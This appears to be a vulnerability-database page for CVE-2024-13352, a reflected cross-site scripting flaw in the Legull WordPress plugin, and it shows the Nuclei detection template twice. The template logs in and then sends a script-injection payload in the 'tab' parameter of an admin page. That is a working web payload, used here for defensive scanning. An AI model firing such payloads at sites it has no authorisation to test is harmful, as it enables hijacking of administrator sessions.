Legull WordPress - Cross-Site Scripting

CVE-2024-13352

Verified

Description

Legull WordPress plugin <= 1.2.2 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires victim to click malicious link.

Severity

High

CVSS Score

7.1

Exploit Probability

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-13352.yaml

id: CVE-2024-13352

info:
  name: Legull WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Legull WordPress plugin <= 1.2.2 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires victim to click malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/2c141cc0-f79e-42bd-97a6-98829647104c/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13352
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13352
    cwe-id: CWE-79
    epss-score: 0.02838
    epss-percentile: 0.86384
    cpe: cpe:2.3:a:alwayscurious:legull:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2024,wordpress,wp-plugin,xss,legull

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=legull_terms&tab=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 4a0a00473045022100debd3422566f8659f86cc6827beb8d428c87c2cbd6547043cb7609a7133a191d02202226fbc6bb785ef257c1bf78d42b5002be1685f4c7793bf8886175eb3109fe6f:922c64590222798bb761d5b6d8e72950

7.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

CVE ID:

cve-2024-13352

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/2c141cc0-f79e-42bd-97a6-98829647104c/https://nvd.nist.gov/vuln/detail/CVE-2024-13352

Remediation Steps

Update to the latest version of the plugin where the vulnerability is fixed.

id: CVE-2024-13352

info:
  name: Legull WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Legull WordPress plugin <= 1.2.2 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires victim to click malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/2c141cc0-f79e-42bd-97a6-98829647104c/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13352
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13352
    cwe-id: CWE-79
    epss-score: 0.02838
    epss-percentile: 0.86384
    cpe: cpe:2.3:a:alwayscurious:legull:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2024,wordpress,wp-plugin,xss,legull

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=legull_terms&tab=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`")
        condition: and
# digest: 4a0a00473045022100debd3422566f8659f86cc6827beb8d428c87c2cbd6547043cb7609a7133a191d02202226fbc6bb785ef257c1bf78d42b5002be1685f4c7793bf8886175eb3109fe6f:922c64590222798bb761d5b6d8e72950

Legull WordPress - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Legull WordPress - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps